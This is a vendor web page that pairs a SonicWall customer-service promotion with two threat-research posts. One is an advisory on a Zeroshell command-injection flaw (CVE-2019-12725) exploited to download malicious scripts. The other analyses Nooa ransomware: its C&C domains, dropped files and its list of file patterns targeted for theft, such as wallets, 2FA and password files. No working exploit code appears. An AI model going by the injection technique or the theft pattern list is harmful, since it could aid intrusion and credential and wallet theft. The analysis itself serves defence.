There are many reasons customers choose SonicWall. Our product portfolio incorporates the newest threat-prevention technologies while continuing to offer an industry-leading TCO. Our Boundless Cybersecurity model offers a platform approach to cybersecurity, employing artificial intelligence and machine learning to help businesses bridge the cybersecurity business gap.  And our solutions continue to earn the approval of third-party testing agencies.

But one factor is cited again and again in their decision to stay with SonicWall: Our customer service. We strive to provide a variety of avenues for customers to address any question or issue, and take the feedback we receive on the resolution process seriously.

Because some customers don’t want to have to make a phone call to resolve a simple issue, we’ve modernized self-service options that have earned high ratings from users. SonicWall’s self-service score is a best-in-class 16:1, meaning that among those who choose to troubleshoot an issue on their own, the overwhelming majority are able to quickly and easily able to find a satisfactory resolution. And our knowledgebase, which is home to a wide assortment of technical documents and how-tos, has earned a 96% satisfaction rating.

But for more complex issues, we recognize that there’s often no substitute for speaking to a real person. SonicWall’s technical agents have earned an 86% satisfaction rating, and 56% of our support cases are resolved in the first business day — allowing our customers to more quickly resume business as usual.

We’ve seen similar positive responses via the Gartner Peer Insights portal. Despite the fact that the SonicWall Community has only been online for a little over a year, it’s already earning a 4.2 out of 5 from respondents. Respondents that have utilized technical support have been similarly satisfied, ranking that facet a 4.3 out of 5.

And, true to its name, SonicWall ranks high in timeliness of vendor response, earning a 4.4 out of 5 — the same score given to SonicWall’s service and support overall.

As a whole, SonicWall earns a 4.62 out of 5 rating — higher than the Gartner Peer Insights score for a majority of our competitors, and a testament to our continued commitment to customer service, before, during and after the sale.

We’d like to take this opportunity to thank each and every one of the customers who have chosen to put their trust in us. It’s been a privilege serving you over the past 30 years, and we hope to spend the next 30 years doing all we can to continue earning your loyalty and exceeding your expectations.

Zeroshell command injection vulnerability

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in Zeroshell.

Zeroshell is a small open-source Linux distribution for servers and embedded systems that aims to provide network services Its administration relies on a web-based graphical interface.

Zeroshell is a Linux based distribution  dedicated to the implementation of router and firewall appliances completely administrable via  web interface. Zeroshell is available for x86/x86-64 platforms and ARM based devices such as Raspberry Pi.

Zeroshell command injection vulnerability | CVE-2019-12725

The goal of command injection  attack  is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation

An unauthenticated command injection vulnerability exists in ZeroShell 3.9.0 in the  URL. As sudo is configured to execute bin without a password (NOPASSWD) it is possible to run root commands using the “checkpoint” tar options.

Some of the exploits found in the wild are :

As one can see the vulnerable  URL is set to NoAuthREQ and the attacker is able to inject and execute the commands to change the directory and download malicious script from the attacker controlled server.

 

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 2366: Zeroshell Remote Code Execution
      • GAV : Mirai.ELF_2

IoCs
5.206.227.228
c22dce4ab0b5a0b2d8e921652ecc3df116568c1afd7222747a8bb1a87a2cfc59
ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477

Threat Graph

Nooa ransomware seeks out your crypto wallets and passwords

/in /by

The SonicWall Capture Labs threat research team has recently been tracking malware that does more than encrypt files and demand a ransom.  In the ransomware space there has been an increase in malware that also steals data from infected machines.  Some ransomware actors use this data to extort even more money from their victims.  These ransomware actors, however, are interested in stealing crypto wallets, browser cookies and passwords.

 

Infection Cycle:

 

Upon infection, the file encryption process starts immediately.  Files hosted on any attached external or network drives are also encypted.  Encrypted files are given a “.nooa” filename extension.

 

The following DNS requests are made by the malware:

  • api.2ip.ua
  • securebiz.org
  • astdg.top
  • prophefliloc.tumblr.com

 

The following files are downloaded onto the system:

 

  • C:\SystemID\PersonalID
  • %SYSTEMDRIVE%\_readme.txt
  • %SYSTEMDRIVE%\$WinREAgent\_readme.txt
  • %SYSTEMDRIVE%\$WinREAgent\Scratch\_readme.txt
  • %USERPROFILE%\_readme.txt
  • %APPDATA%\Roaming\Microsoft\Windows\Recent\_readme.lnk
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\4EQF0LUO\msvcp140[1].dll
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\LHLB6AIE\nss3[1].dll
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\N5CLIG2L\freebl3[1].dll
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\N5CLIG2L\softokn3[1].dll
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\VQ7BRAAE\mozglue[1].dll
  • %APPDATA%\Local\Microsoft\Windows\INetCache\IE\VQ7BRAAE\vcruntime140[1].dll
  • %APPDATA%\Local\{rand}\build2.exe [Detected as: GAV: Conficker.gen (Worm)]

 

PersonalID contains an ID that is unique to each infection:

PLtnD1U6oAmgxgJ2nJik1mY9SwUQg07CiN0zSet1

 

_readme.txt contains the following message:

 

The malware downloads and runs build2.exe:

 

build2.exe reports the infection to a C&C server and receives data from it:

 

Decompression of the data above reveals the following message containing files targeted for exfiltration:

DESKTOP;%DESKTOP%\;*wallet*.*:*2fa*.*:*backup*.txt:*backup*.png:*backup*.jpg:*code*.txt:*code*.png:*code*.jpg:*password*.*:*auth*.txt:*auth*.png:*auth*.jpg:*crypto*.*:*key*.txt:*key*.png:*key*.jpg:*ledger*.*:*metamask*.*:*blockchain*.*:*bittrex*.*:*binance*.*:*coinbase*.*:*trezor*.*:*exodus*.*:*UTC--201*.*;300;true;movies:music:mp3;lnk;

 

build2.exe then searches the system for the filetypes and directories listed above.  This includes 2fa data, crypto wallets and browser cookies.  If such data is found, it is compressed and uploaded to the C&C server in zip format.  The malware also captures and sends system information and a screenshot of the desktop:

 

information.txt contains system information from the infected machine:

 

We reached out to the email addresses provided in the ransom message and received the following response:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Waledac.gen.2 (Worm)
  • GAV: Conficker.gen (Worm)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.